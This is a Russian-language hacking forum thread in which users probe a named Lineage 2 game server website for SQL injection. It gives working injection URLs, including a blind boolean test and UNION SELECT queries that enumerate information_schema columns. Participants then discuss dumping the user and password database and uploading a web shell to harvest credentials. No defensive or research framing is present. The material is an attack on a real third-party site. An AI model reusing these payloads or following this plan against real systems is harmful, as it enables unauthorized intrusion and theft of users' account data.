![]() |
Wnet
все таки одна скуля нашлась=)
Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),1,1)))=53/* 5 |
А чего так криво)) связка операторов union+select вполне функционирует
Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/*Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x4e7063496e666f/* |
тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\
Код:
CHARACTER_SETS |
xss. ';/ фильтруются
Цитата:
|
ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл |
Цитата:
и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе... |
Офф на МайСкюл?
какие серваки ты ставил? может явы... внет считается одним из топ УА сервов ла2... то что там БД не Мумкул (от серва) гарантирую +Гмы не настолько там тупы (с виду =))) ) было у мну дело тоже с оффом вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось... база с сервом стоят в офисе (хз что и как настроено) теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь) там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд) ну а там думать ) строго не судите пост 02.00 |
да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету
|
слуш почему ты так уверен что это ява то? )
вот сколько лет уже его почемуто оффом называют... я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может... и ставил его поверь мне не ребенок, серв профисиональный, явы так обычно не работают много показателей... хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом... сомневаюсь очень крайне что он на мускуле... ты хоть раз ставил офф? еще раз вопрос - откуда такие сравнения? --- |
Офф на каждом втором серваке сейчас стоит, слили все, кому не лень
По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт. |
| Время: 05:06 |